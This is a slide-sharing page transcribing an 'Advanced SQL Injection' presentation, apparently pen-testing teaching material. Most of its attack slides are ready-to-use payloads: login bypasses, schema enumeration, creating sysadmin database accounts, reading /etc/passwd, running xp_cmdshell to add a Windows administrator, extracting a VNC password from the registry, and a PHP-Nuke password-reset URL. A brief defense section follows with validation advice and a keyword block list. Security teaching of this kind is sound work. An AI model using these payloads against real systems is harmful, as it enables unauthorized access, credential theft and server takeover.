advanced sql injection how 2 hack sql queries n.
Download
Skip this Video
Loading SlideShow in 5 Seconds..
Advanced SQL Injection How 2 hAcK SQL queries && … PowerPoint Presentation
Download Presentation
Advanced SQL Injection How 2 hAcK SQL queries && …

Loading in 2 Seconds...

play fullscreen
1 / 38

Advanced SQL Injection How 2 hAcK SQL queries && … - PowerPoint PPT Presentation


  • 128 Views
  • Uploaded on

Advanced SQL Injection How 2 hAcK SQL queries && …. Ali Mehrabian http://logicman.net mail@logicman.net. What is SQL?. SQL stands for Structured Query Language Allows us to access a database ANSI and ISO standard computer language SQL can: execute queries against a database

loader
I am the owner, or an agent authorized to act on behalf of the owner, of the copyrighted work described.
capcha
Download Presentation

PowerPoint Slideshow about 'Advanced SQL Injection How 2 hAcK SQL queries && …' - betrys


Download Now An Image/Link below is provided (as is) to download presentation

Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author.While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server.


- - - - - - - - - - - - - - - - - - - - - - - - - - E N D - - - - - - - - - - - - - - - - - - - - - - - - - -
Presentation Transcript
advanced sql injection how 2 hack sql queries

Advanced SQL InjectionHow 2 hAcK SQL queries && …

Ali Mehrabian

http://logicman.net

mail@logicman.net

slide2

What is SQL?

  • SQL stands for Structured Query Language
  • Allows us to access a database
  • ANSI and ISO standard computer language
  • SQL can:
    • execute queries against a database
    • retrieve data from a database
    • insert new records in a database
    • delete records from a database
    • update records in a database
slide3

SQL is a Standard - but...

  • There are many different versions of the SQL language
  • They support the same major keywords in a similar manner (such as SELECT, UPDATE, DELETE, INSERT, WHERE, and others).
  • Most of the SQL database programs also have their own proprietary extensions in addition to the SQL standard!
slide4

SQL Database Tables

  • A relational database contains one or more tables identified each by a name
  • Tables contain records (rows) with data
  • For example, the following table is called "users" and contains data distributed in rows and columns:
slide5

SQL Queries

  • With SQL, we can query a database and have a result set returned
  • Using the previous table, a query like this:

SELECT LastNameFROM users WHERE UserID = 1;

  • Gives a result set like this:

LastName

--------------

Smith

slide6

What is SQL Injection?

The ability to inject SQL commands into the database enginethrough an existing application

slide7

How common is it?

  • It is probably the most common Website vulnerability today!
  • It is a flaw in "web application" development, it is not a DB or web server problem
    • Most programmers are still not aware of this problem
    • A lot of the tutorials & demo “templates” are vulnerable
    • Even worse, a lot of solutions posted on the Internet are not good enough
  • In some pen tests over 60% of clients turn out to be vulnerable to SQL Injection
slide8

Vulnerable Applications

  • Almost all SQL databases and programming languages are potentially vulnerable
    • MS SQL Server, Oracle, MySQL, Postgres, DB2, MS Access, Sybase, Informix, etc
  • Accessed through applications developed using:
    • Perl and CGI scripts that access databases
    • ASP, JSP, PHP
    • XML, XSL and XSQL
    • Javascript
    • VB, MFC, and other ODBC-based tools and APIs
    • DB specific Web-based applications and API’s
    • Reports and DB Applications
    • 3 and 4GL-based languages (C, OCI, Pro*C, and COBOL)
    • many more
slide9

How does SQL Injection work?

Common vulnerable login query

SELECT * FROM users

WHERE login = 'kEnBy'

AND password = '123'

(If it returns something then login!)

ASP/MS SQL Server login syntax

varsql = "SELECT * FROM users

WHERE login = '" + formusr +

"' AND password = '" + formpwd + "'";

slide10

Injecting through Strings

formusr = ' or 1=1 – –

formpwd = anything

Final query would look like this:

SELECT * FROM users

WHERE username = ' ' or 1=1

– –AND password = 'anything'

slide11

The power of '

  • It closes the string parameter
  • Everything after is considered part of the SQL command
  • Misleading Internet suggestions include:
    • Escape it! : replace ' with ' '
  • String fields are very common but there are other types of fields:
    • Numeric
    • Dates
slide12

If it were numeric?

SELECT * FROM clients

WHERE account = 12345678

AND pin = 1111

PHP/MySQL login syntax

$sql = "SELECT * FROM clients WHERE " .

"account = $formacct AND " .

"pin = $formpin";

slide13

Injecting Numeric Fields

$formacct= 1 or 1=1 #

$formpin= 1111

Final query would look like this:

SELECT * FROM clients

WHERE account = 1 or 1=1

#AND pin = 1111

slide14

SQL Injection Characters

  • ' or"character String Indicators
  • -- or # single-line comment
  • /*…*/ multiple-line comment
  • + addition, concatenate (or space in url)
  • || (double pipe) concatenate
  • % wildcard attribute indicator
  • ?Param1=foo&Param2=bar URL Parameters
  • PRINT useful as non transactional command
  • @variable local variable
  • @@variable global variable
  • waitfor delay '0:0:10'time delay
slide16

2) Info. Gathering

3) 1=1 Attacks

5) OS Interaction

4) Extracting Data

6) OS Cmd Prompt

7) Expand Influence

SQL Injection Testing Methodology

1) Input Validation

slide17

Discovery of Vulnerabilities

  • Vulnerabilities can be anywhere, we check all entry points:
    • Fields in web forms
    • Script parameters in URL query strings
    • Values stored in cookies or hidden fields
  • By "fuzzing" we insert into every one:
    • Character sequence: ' " ) # || + >
    • SQL reserved words with white space delimiters
      • %09select (tab%09, carriage return%13, linefeed%10 and space%32 with and, or, update, insert, exec, etc)
    • Delay query ' waitfor delay '0:0:10'--
slide18

2) Information Gathering

  • We will try to find out the following:
    • Output mechanism
    • Understand the query
    • Determine database type
    • Find out user privilege level
    • Determine OS interaction level
slide19

Is it a stored procedure?

  • We use different injections to determine what we can or cannot do
    • ,@variable
    • ?Param1=foo&Param2=bar
    • PRINT
    • PRINT @@variable
slide20

c) Determine Database Engine Type

  • Most times the error messages will let us know what DB engine we are working with
    • ODBC errors will display database type as part of the driver information
  • If we have no ODBC error messages:
    • We make an educated guess based on the Operating System and Web Server
    • Or we use DB-specific characters, commands or stored procedures that will generate different error messages
slide21

Discover DB structure

  • Determine table and column names' group bycolumnnameshaving 1=1 --
  • Discover column name types

' union select sum(columnname)from tablename --

  • Enumerate user defined tables

' and 1 in (select min(name) from sysobjects where xtype = 'U' and name > '.') --

slide22

System Tables

  • Oracle
    • SYS.USER_OBJECTS
    • SYS.TAB
    • SYS.USER_TEBLES
    • SYS.USER_VIEWS
    • SYS.ALL_TABLES
    • SYS.USER_TAB_COLUMNS
    • SYS.USER_CATALOG
  • MySQL
    • mysql.user
    • mysql.host
    • mysql.db
  • MS Access
    • MsysACEs
    • MsysObjects
    • MsysQueries
    • MsysRelationships
  • MS SQL Server
    • sysobjects
    • syscolumns
    • systypes
    • sysdatabases
slide23

Create DB Accounts

MS SQL

  • exec sp_addlogin 'kEnBy', 'Pass123'
  • exec sp_addsrvrolemember 'kEnBy', 'sysadmin'

MySQL

  • INSERT INTO mysql.user (user, host, password) VALUES ('kEnBy', 'localhost', PASSWORD('Pass123'))

Access

  • CREATE USER kEnBy IDENTIFIED BY 'Pass123'

Postgres (requires UNIX account)

  • CREATE USER kEnBy WITH PASSWORD 'Pass123'

Oracle

  • CREATE USER kEnBy IDENTIFIED BY Pass123 TEMPORARY TABLESPACE temp DEFAULT TABLESPACE users;
  • GRANT CONNECT TO kEnBy;
  • GRANT RESOURCE TO kEnBy;
slide25

Interacting with the OS

  • Two ways to interact with the OS:
    • Reading and writing system files from disk
      • Find passwords and configuration files
      • Change passwords and configuration
      • Execute commands by overwriting initialization or configuration files
    • Direct command execution
      • We can do anything
  • Both are restricted by the database's running privileges and permissions
slide26

MySQL OS Interaction

  • MySQL
    • LOAD_FILE
      • ' union select 1,load_file('/etc/passwd'),1,1,1;
    • LOAD DATA INFILE
      • create table temp( line blob );
      • load data infile '/etc/passwd' into table temp;
      • select * from temp;
    • SELECT INTO OUTFILE
slide27

MS SQL OS Interaction

  • MS SQL Server
    • '; exec master..xp_cmdshell 'ipconfig > test.txt' --
    • '; CREATE TABLE tmp (txt varchar(8000)); BULK INSERT tmp FROM 'test.txt' --
    • '; begin declare @data varchar(8000) ; set @data='| ' ; select @data=@data+txt+' | ' from tmp where txt<@data ; select @data as x into temp end --
    • ' and 1 in (select substring(x,1,256) from temp) --
    • '; declare @var sysname; set @var = 'del test.txt'; EXEC master..xp_cmdshell @var; drop table temp; drop table tmp --
slide28

Jumping to the OS

  • Linux based MySQL
    • ' union select 1, (load_file('/etc/passwd')),1,1,1;
  • MS SQL Windows Password Creation
    • '; exec xp_cmdshell 'net user /add victor Pass123'--
    • '; exec xp_cmdshell 'net localgroup /add administrators victor' --
  • Starting Services
    • '; exec master..xp_servicecontrol 'start','FTP Publishing' --
slide29

Retrieving VNC Password from Registry

  • '; declare@out binary(8)exec master..xp_regread@rootkey='HKEY_LOCAL_MACHINE', @key='SOFTWARE\ORL\WinVNC3\Default', @value_name='Password', @value = @outoutputselect cast(@out as bigint) as x into TEMP--
  • ' and 1 in (select cast(x as varchar) from temp) --
slide31

SQL Injection Defense

  • It is quite simple: input validation
  • The real challenge is making best practices consistent through all your code
    • Enforce "strong design" in new applications
    • You should audit your existing websites and source code
  • Even if you have an air tight design, harden your servers
slide32

Strong Design

  • Define an easy "secure" path to querying data
    • Use stored procedures for interacting with database
    • Call stored procedures through a parameterized API
    • Validate all input through generic routines
    • Use the principle of "least privilege"
      • Define several roles, one for each kind of query
slide33

Input Validation

  • Define data types for each field
    • Implement stringent "allow only good" filters
      • If the input is supposed to be numeric, use a numeric variable in your script to store it
    • Reject bad input rather than attempting to escape or modify it
    • Implement stringent "known bad" filters
      • For example: reject "select", "insert", "update", "shutdown", "delete", "drop", "--", "'"
slide35

PHP-Nuke SQL injection

  • Malicious url:
    • modules.php?name=Your_Account&op=saveuser&uid=2&bio=%5c&EditedMessage=no&pass=xxxxx&vpass=xxxxx&newsletter=,+pass=md5(1)/*
  • %5c is the encoding for ‘\’
slide36

References

  • A lot of SQL Injection related papers
    • http://www.nextgenss.com/papers.htm
    • http://www.spidynamics.com/support/whitepapers/
    • http://www.appsecinc.com/techdocs/whitepapers.html
    • http://www.atstake.com/research/advisories
  • Other resources
    • http://www.owasp.org
    • http://Governmentsecurity.org/Forum
    • http://ashiyane.org
    • http://www.sqlsecurity.com
    • http://www.securityfocus.com/infocus/1768
advanced sql injection how 2 hack sql queries1

Advanced SQL InjectionHow 2 hAcK SQL queries && …

Ali Mehrabian

http://logicman.net

mail@logicman.net

slide38

?

aNyQuEsTiOn